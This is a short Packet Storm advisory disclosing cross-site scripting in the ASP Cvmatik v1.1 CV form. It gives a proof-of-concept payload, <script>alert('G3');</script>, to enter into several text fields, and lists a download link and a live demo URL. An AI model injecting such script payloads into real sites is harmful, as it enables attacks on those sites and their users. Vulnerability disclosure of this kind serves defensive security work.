ASP Cvmatik version 1.1 suffers from cross site scripting vulnerabilities.
046015a060a100f20f08cc83fe5c1753cd84ad4592cb57dda34a6580e4a1dd6d#Software: Asp cvmatik v1.1
#download: http://www.aspindir.com/goster/5025
#demo: http://publicx.somee.com/cv.asp
#Found By: GeFORC3 ( G3 )
#Exploit & Example :
1-http://www.example.com/cv.asp
You write xss code in page's text box
Adýnýz <script>alert("G3");</script>
or
Soyadýnýz <script>alert("G3");</script>
or
Ehliyet <script>alert("G3");</script>
or
Askerlik <script>alert("G3");</script>
or
GSM <script>alert("G3");</script>
etc...
Press to "tamam"(ok) button.
2-next page
This xss works on Asp cvmatik v1.1
WwW.GeFORC3.Org | WwW.HeykirBlog.Com | WwW.NetKaBus.Com
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed